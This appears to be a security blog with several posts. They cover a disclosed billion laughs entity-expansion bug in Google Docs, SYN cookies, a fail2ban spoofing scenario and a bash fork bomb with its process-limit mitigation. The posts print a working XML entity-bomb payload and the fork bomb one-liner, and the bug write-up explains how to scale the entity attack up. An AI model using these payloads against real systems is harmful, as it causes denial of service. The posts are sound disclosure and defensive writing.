Google Docs Billion Laughs

This is a writeup of a bug (now fixed) I reported to Google last year.

A billion laughs attack was present in the Google Docs document parser. When the engine would parse a document it would resolve internal entities by expanding them. This eventually earned me a spot on the Google Wall of Sheep, but alas, no reward because it’s a DoS bug and DoS bugs don’t qualify.

With any type of DoS bug on a large service, it’s fairly difficult to determine the exact severity. There might be things that mitigate this somewhat, like there is probably throttling, the APIs might restrict on a per user basis, etc. Regardless, with one request it’s likely that it could tie up a processor for some amount of time (evidence suggests at least a couple minutes, but I suspect a lot more). This was clearly a bug; Google Docs was resolving internal entities without limit which is a CPU intensive operation and requires very little client processing/bandwidth.

Here’s a link 17th order billion laughs document: test17. Unzip and look in content.xml. To increase order of attack, change the entity it points to (eg &a19;, &a20, etc). The attack itself is very straightforward, and for those who don’t want to look at the doc, it just looks something like this, generated mostly from a legitimate ODT file:

<!--?xml version="1.0" encoding="UTF-8"?-->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE billion [
  <!ENTITY a0 "Bomb!">
  <!ENTITY a1 "&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;">
...
  <!ENTITY a25 "&a24;&a24;">
]>
...
<text:p text:style-name="Standard">Test &a17;</text:p>

Here are some interesting metrics on various laugh sizes:

  • 16th order took about 4 seconds for the app to return
  • 17th order took about 8 seconds for the app to return
  • 18th order took about 20 seconds and the upload is eventually rejected, after several empty files are created with the same name
  • 20th order took about 1:20 and the upload is eventually rejected, dozens of empty files are created (I’m not sure what was going on with that).
  • 21st order never seemed to “finish”

One quick note is I never found anywhere that external entities were resolved. It’s hard to tell for sure because certain egress/chroot-type mitigations could have just helped make this hard to exploit. Correct or not, I sort of suspected the external entity thing might not be a problem. Openoffice resolved internal but not external entities, so (right or wrong) I guessed that it’s somewhat likely that Google is re-using or at least sort of mimicking openoffice’s document parser.

The reporting process was fairly nighmarish, but I put the blame mostly on MSVR rather than Google… not to point fingers, all I know is I never heard much of anything back.

In any serious service I think DoS bugs get a bad rap. I’ve met a lot of people who consider DoS bugs as low severity just based on that classification alone. In reality, I think people tend to care a lot more about when an online service is unavailable. When Sony did everything terribly, did most people care about the data they lost? Some did (I did), but I think most just wanted to start playing games again already. So what’s more severe? A clickjacking bug in Facebook that allows you to do a targeted attack to take over someone’s account, or a DoS bug that can bring down Facebook?

With some imagination, I wonder if something like this could have been used in the right (wrong?) hands to bring down a service as large as Google Docs.

syn cookies

An interesting cryptographic  way to deal with syn floods is syn cookies.  SYN floods are simply a bunch of syn packets from spoofed ip addresses, and are a fairly common dos attack.   Some other ways to deal with these include increasing the syn queue size and decreasing the wait  for reply time, but these don’t really solve the problem.

SYN cookies are built into the Linux kernel by default (though usually not enabled by default).  You can find and configure this feature in proc/sys.  For example, to enable them you could

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

syn cookies provide a way to build the syn number in a tcp handshake so that it can be used to reconstruct initial syn numbers of legitimate clients after they return the final ack (it checks it using a function and rebuilds the syn queue).  This allows kernel resources to be reused that would normally be waiting on the connection after receiving the first syn.

A normal tcp handshake looks like:

syn
syn-ack
ack

Under a syn attack, most syn-acks sent by you (the target of the attack) will never respond with that final ack since they were falsely generated. syn cookies are an effective defense against this. A server that uses SYN cookies doesn’t have to drop connections when its SYN queue fills up.

For more information about syn cookies, see http://cr.yp.to/syncookies.html

For why it might not be enabled by default see: http://www.mail-archive.com/netdev@vger.kernel.org/msg61116.html

Despite this, it probably make sense in many environments.

fail2ban attack

I was talking about fail2ban running from my firewall and a certain IP being the only one allowed in (as specified in iptables).  First of all, I should probably be using port knocking or something better for this scenario (in fact, after the comment I went ahead and put spa on the firewalls – something I’ve been meaning to do anyway for awhile now) but that’s beside the point.

fail2ban works by denying an ip address for x amount of time because of failed logins.  It does this by using log entries from /var/log/auth.log and writing corresponding iptables rules.  This is mostly for limiting ssh login failures.

If you spoofed the ipaddress of the machine I was logging in from, you could maybe launch a dos by getting the legitimate machine banned. Realistically, I think the attack would not succeed.  Here’s what would happen.

  1. An attacker sends a spoofed connection packet to my firewall with a legitimate ip address (so it makes it through my dummy firewall)
  2. The ssh server responsds with a syn/ack to the correct ip address (not the attacker)
  3. The correct ip address doesn’t know where this came from, so either drops it or sends a RST packet if there are no firewall controls on the sender machine.

The point is that the handshake is never completed, so there is never a failed login entry in /var/log/auth, and it never gets so far as to fail2ban.

 

Bash Bomb

So my buddy Greg pointed me to what he called a ‘bash bomb’.  It looks like:

:(){ :|:& };:

Anyway, all it does is recursively fork.  http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/ gives a good explanation.  I do like it, because of its simplicity and obscurity. I have to deal with recursively forking things all the time (thanks operating system class with students experimenting with fork for the first time).

A simple pam hard limit on the number of processes can mitigate against this.  Put it in /etc/security/limits.conf.

My applicable limits are (fairly liberal):

*               soft    nproc           225
*               hard    nproc          300

So far, nothing has crashed the system with these, but I keep having to tweak them, so I may restrict them further in the future.